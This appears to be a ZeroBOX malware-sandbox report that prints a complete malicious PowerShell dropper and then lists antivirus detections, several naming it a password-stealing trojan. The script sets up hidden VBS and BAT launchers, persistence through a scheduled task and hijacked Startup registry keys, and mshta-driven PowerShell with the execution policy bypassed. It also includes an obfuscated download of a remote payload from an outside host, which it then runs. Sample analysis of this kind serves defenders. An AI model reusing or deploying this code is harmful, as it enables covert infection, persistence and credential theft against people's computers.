Static | ZeroBOX
No static analysis available.
Function WoRk
start-sleep -s 2
[system.io.directory]::CreateDirectory("C:\ProgramData\WindowsHost\")
New-Item -Path C:\ProgramData\WindowsHost\StateWindow.vbs -ItemType File
start-sleep -s 1
Set-ItemProperty -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Name IsReadOnly -Value $True
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'set alosh = wscript.createobject("WScript.shell")' -Force
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'alosh.run """C:\Users\Public\WindowsState.bat"" ", 0, true' -Force
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'Set alosh = Nothing' -Force
start-sleep -s 1
Get-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs
New-Item -Path C:\Users\Public\WindowsState.bat -ItemType File
start-sleep -s 1
Set-ItemProperty -Path C:\Users\Public\WindowsState.bat -Name IsReadOnly -Value $True
start-sleep -s 1
Add-Content -Path C:\Users\Public\WindowsState.bat -Value 'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & ''C"+":"+"\"+"U"+"s"+"e"+"r"+"s"+"\"+"P"+"u"+"b"+"l"+"i"+"c"+"\statewindow.ps1''"", 0:close")' -Force
start-sleep -s 4
Get-Content -Path C:\Users\Public\WindowsState.bat
start-sleep -s 3
$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\WindowsHost\StateWindow.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "WindowsHost"
start-sleep -s 3
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost";
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost";
start-sleep -s 6
$DEV = 'C>><<<>><<<>>blic\'.Replace(">><<<>><<<>>",":\Users\Pu")
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://vintagebri.com/.1.txt', $DEV + 'statewindow.ps1')){
start-sleep -s 10
Start "C:\ProgramData\WindowsHost\StateWindow.vbs"
Start "C:\ProgramData\WindowsHost\StateWindow.vbs"
IEX WoRk
Antivirus              Signature
---------------------  ------------------------
Bkav                   Clean
Lionic                 Clean
DrWeb                  PowerShell.DownLoader.1403
MicroWorld-eScan       Trojan.PWS.Agent.SVN
FireEye                Trojan.PWS.Agent.SVN
CAT-QuickHeal          Clean
McAfee                 Clean
Malwarebytes           Clean
Sangfor                Clean
K7AntiVirus            Clean
K7GW                   Clean
BitDefenderTheta       Clean
Cyren                  Clean
ESET-NOD32             VBS/Runner.NQD
TrendMicro-HouseCall   Clean
Avast                  Clean
ClamAV                 Clean
Kaspersky              Clean
BitDefender            Trojan.PWS.Agent.SVN
NANO-Antivirus         Clean
ViRobot                Clean
Rising                 Clean
Ad-Aware               Trojan.PWS.Agent.SVN
Sophos                 Clean
Comodo                 Clean
F-Secure               Clean
Baidu                  Clean
Zillya                 Clean
TrendMicro             Clean
CMC                    Clean
Emsisoft               Clean
Ikarus                 Clean
Jiangmin               Clean
Avira                  TR/PShell.PRL
Kingsoft               Clean
Gridinsoft             Clean
Arcabit                Trojan.PWS.Agent.SVN
SUPERAntiSpyware       Clean
ZoneAlarm              Clean
Microsoft              Clean
Cynet                  Malicious (score: 99)
AhnLab-V3              Clean
VBA32                  Clean
ALYac                  Trojan.PWS.Agent.SVN
MAX                    malware (ai score=83)
Zoner                  Clean
Tencent                Clean
Yandex                 Clean
TACHYON                Clean
MaxSecure              Clean
Fortinet               Clean
Panda                  Clean
No IRMA results available.